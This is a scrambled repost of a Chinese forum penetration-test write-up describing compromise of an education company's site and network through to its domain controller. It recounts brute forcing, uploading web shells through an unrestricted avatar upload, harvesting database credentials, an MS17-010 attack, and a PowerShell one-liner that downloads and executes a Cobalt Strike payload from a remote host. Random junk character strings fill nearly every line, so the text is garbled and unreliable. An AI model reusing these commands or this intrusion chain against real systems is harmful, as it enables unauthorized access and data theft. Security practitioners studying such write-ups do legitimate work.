2 G! W# k2 i, b 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ `/ d# p1 u& N% M6 L
6 F3 W D& f/ V& f, r8 a; `( [' Y! V$ L: s0 f+ y
1 @+ I q% c& m- I
' h. W' E. Q* n8 k5 k2 s% u5 }3 o
& p1 U5 e& J1 g 正文
( R- g, H( ]. S
. b+ n! Y( y' Z
% }7 e/ g2 o, K3 E9 C
/ u4 G2 S4 E D! a8 g6 t
7 ^+ \& Q* N B0 v3 l" M1 p0 R" \ Y: }4 `2 v
目标:www.xxxx.com(一家教育机构) , A( H& U1 N; f3 K% o5 z+ W
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 ^2 W" E7 `" f4 m* k
A" k% d" {# T4 R6 g# c1 M7 x5 Y T- R0 f0 o; B0 c
6 N/ C6 ]% j9 R8 [% W# S. k( r
& t b: i+ C" o3 w: Q
0 u; P i5 D1 k# K4 `4 h 进行了简单的信息搜集 + C0 ^: r5 U; k4 a; ^
3 f s, b( w/ E) R7 `3 u% R
6 f% _3 y0 g; j 2 |$ V- T. _& S
1 H1 n8 x: \ o7 L* T5 R
子域名搜集( U4 ~! z+ B9 z3 z$ q) U( b- N7 O
$ ?0 ?5 G4 U; J7 j: T
0 y! k& g0 u+ a
; _ k) G7 E# V+ G7 f& r% l, Q 2 X( i& A" f: G* S# P3 K9 V. R$ h
2 j8 [' m3 R+ A- H" W fofa找资产
3 g5 c; d$ i& H
4 [' m) H" W! n" e t6 b4 ?* V% f3 w( o
9 T- C- o& a2 e; W& [" F& k9 Q5 G, i! ]3 Y
7 X# I" h9 f- g* K 5 M$ z; H$ }, h; }6 v' T. P! @+ j
2 k1 A0 g8 q$ T6 B
一共七个资产。去重之后只有两个。
9 c7 ] a; l: [! j4 p) {! a
" V0 \+ M! S( I1 U( t' E; d, p' R/ Q
+ f; M3 l6 k/ L Y
, t+ E6 ]+ w- |. ] 目录探测
, z1 n A: R: A* t ; p& j" A4 M! f1 D: Y2 _" Z2 s
. ^' l0 | N# j7 {( Y6 d& E- H
# K, u" o' f3 H7 K+ e0 O3 i$ R
$ c% Y) w3 P# u" p5 w
N# C. t( s" r" Y O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% r- {$ w0 f! Y
+ b4 o% y9 E# a- ? n) N' z% X+ c' i/ V0 Q2 F
' b0 Q- \8 R6 w: D4 v6 P/ |
1 X7 i9 n$ y2 r( }# B. B9 p# |3 ? 我又尝试了通过修改返回包来绕过登录界面9 p5 f% }4 J0 m; d+ ~% W
9 ~# P. o/ e/ c/ i# a6 N* N* o0 {
5 ~5 e6 Y( Z# l/ ~% G ! Z' [, `: o7 y) V8 |
! p f) O3 p: Y8 H; Q
4 d- a& P8 F" R o/ }* G
还是不行,尝试注入无果
& E* B f" [' x8 t; e ; `4 ]% E( y9 N7 A: h
6 n' o! \- i3 W 5 X' Q& ?) M. P9 H. K$ @; \
) t( J; ^% G2 J2 [
1 H6 n1 E+ q6 o' s6 I 不过我目录探测出了一处Spring信息泄露 4 ]' @" u1 w( O5 _9 N/ U& _7 G
! y5 g1 k; k$ D+ N
- ?1 G0 e! H3 ^: ]1 v8 F9 Q
2 M% N# h% n+ @. L( G, v- m9 k5 s" i
" H N+ q/ t5 V2 d
9 U$ V6 l1 P* H6 K; y
Z' E" v5 f1 q! P+ O$ G! `8 s7 B- \
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
. C% Z" ]: Y7 w o# V/ Z/ p8 J' d
; G7 U& @5 x1 _4 o0 a% ~6 q
9 }: M1 ~ {+ p4 U
& Y5 w$ S6 Y- [2 b' _ & d1 ^2 F0 ~8 g( k. o( x
% X. F* \3 `. |1 O0 P/ W8 ] 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。4 e' Y) d9 j4 J, u5 Z' e
* g, M, N! f0 c' V- s/ G" m, i
5 z2 f! i; ~1 k1 L; F- q1 | 9 d6 i& F D* v n1 A8 Y3 p; O
0 O0 Y; q7 y: x4 W' u
) j/ G' o: y' D9 E& N" K 获取有些师傅到这一步就手机抓包电脑测了。
! l" r7 H4 \* I- w1 I6 x" Z 1 o/ J6 @( x8 W+ I! }3 f( H
: A$ o* T. N/ j$ b! }0 G: _# }* }2 ?
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
" a% q2 E8 v+ f
( B' B# n; E0 ~
7 f% ^' F6 i' ~ 其中在一个公众号发现了小程序,可以进行注册。
, `% T o- F3 }; k1 S( u! H* g ! p- y2 z! G7 H9 |( H; e
" F2 c9 W* B! h# B( F) X
看到了头像上传,尝试上传获取WebShell
% ^& f; P9 q* l9 Q) D w- b# M* X# [
. [5 q9 U; B+ {) y
0 b4 Y2 m! ^3 n& u+ B$ M
7 e* b- [5 }. G
. J+ ^& r0 d# E/ d1 k1 f& @ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 s8 u+ h {, S( _5 c0 z 2 D0 j/ f' v% U' ^1 U% R
- _2 F7 }0 a' p - |) w4 y* u0 C. x; N
( s" f2 ~1 a, D- V0 \8 M
9 Z# ]! O# c; t7 I: X( `3 w 然后上了大马
6 m/ ^, _1 z) h, h% x8 b2 W6 q1 w 8 S- `' I8 m1 Q: H5 p' B
P2 k0 G; D2 I5 t ( q9 Y8 P: n( S5 }
, V. r$ B6 U# ]+ U4 d& l- J0 T% R8 r8 h0 e. n Z# D1 O
9 o6 I& S f" Q5 }
$ C- r+ ?, d6 A; L, }/ E
; j6 M$ s( _% [( Q$ k
通过翻找文件发现数据库账号密码5 s8 Q, \$ i2 g8 D0 s P8 C! _3 x
1 \+ @# U% @4 [6 k; i. ]
8 ^- [7 H( s# R0 v! j 0 Y6 Z. `9 S. y* `
5 r+ P6 W7 H; i' y5 l
1 g, d$ d! g! I4 g2 N+ Y9 O2 m
--内网渗透0 \' U1 k3 m4 I5 d- g
1 o1 L5 F) w) b; z0 j$ H/ l/ ~
1 q: o0 S( Z/ R( y. \2 j1 P 直接通过powershell执行 cs上线* s+ W2 r& d2 e3 b
) A: u/ E! w$ X2 {5 u
) D5 c: |; a4 R, W" S) ^6 X powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
! U% g% j! u8 G0 ? - d, Z8 C& i3 {3 V( f
$ l& [- I0 m4 E; B9 J) k
, u/ ^, j, p3 k4 a% c, b 0 F1 x" f# V0 A8 e! Z2 v S
' u8 J- }" Q# f% r8 k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破1 C' r; q' d' o5 D3 Z& n
" Z$ ?2 {3 Q+ R; w
% A/ i& f$ X% c, I6 ^# l5 W9 E. e
+ o& e8 `! i" }) V; b9 V
0 M7 |! A4 c- j+ b C3 @" e0 d3 [; S W$ K
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 P- H, Q( J: T5 o8 I W$ X# B # ?2 X$ V* a1 @% t
; B6 O9 E. F5 ]% E c, @9 p$ e7 [7 x
+ c( F J9 D+ ^& E # N* V1 w; b) V, F* W& h0 i4 s u; M3 u
* K/ l# ]+ S+ U- B+ {5 A' j% Q
5 @. _4 F# ]4 t( k0 U1 \
: U4 T( s8 w0 m+ t
5 p) {; L6 n9 @1 \8 Z1 X1 S 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 6 s8 L0 p! C7 j9 f; o
& i8 K: T2 Y+ m( f" G
" y# u6 h* z+ _+ ^$ |, E
. F' f# V" ]' P+ P& \$ G% I
( c5 d$ B4 ^1 L6 w9 z3 t; ^
, L9 I1 S/ G# b2 R $ ]2 N1 j( n7 X$ |' @$ j3 J
) X7 u8 t6 z3 Y. V6 x6 ?) L5 O s 3 p0 @) _/ `; w( ]
& Y/ T7 I$ T/ j: ?( ^$ j0 _) k8 L" g; }7 I- F
L6 j+ L! P; C7 ?4 ~/ \" K: L- Z9 |- G1 o8 P+ ~' M
/ g9 y. g Q; u$ ~+ u# H4 ~
- Y ~" F) i1 e& T' I& Y9 w5 `$ T& x2 B% ^8 |
小结
" d+ x$ J4 X1 `8 U! X R1 ~
9 }% T8 h6 W+ y3 n% s0 g
& o% N7 w9 o+ p, Z2 Y% n 8 X/ ]7 H. z, L6 S( @- ?9 h6 ^
. d0 _3 G, Z1 i5 {
0 E( }6 h' h: [
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
7 l6 ~: | L* f) u8 \ 2 ]3 @! d! [ v$ B
' D* {7 e# Q; H9 o
3 _& W6 K! {' {- ]& w . ?* M: C( d. t# n
: r9 ~0 ^* O, d g. q. f$ L - 1 I, h+ N3 M( n) @8 B
8 t( t2 m5 I$ n' @% H
; w3 l2 m1 ^/ d) V8 h - & U, d0 I/ i$ E5 V k) q0 E# I
3 o u. s. E9 g# L5 `
3 e2 Y2 \8 t7 z! e& ~* [
. k$ V0 {+ Z8 y4 z5 _
/ D& ?8 F5 [+ W0 V 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
' ^+ w% g; v+ l9 R4 f 9 S" u1 V# N3 W
4 B0 ^! X* d) R, M8 l9 M
3 x4 N& k ?. ^. U3 q |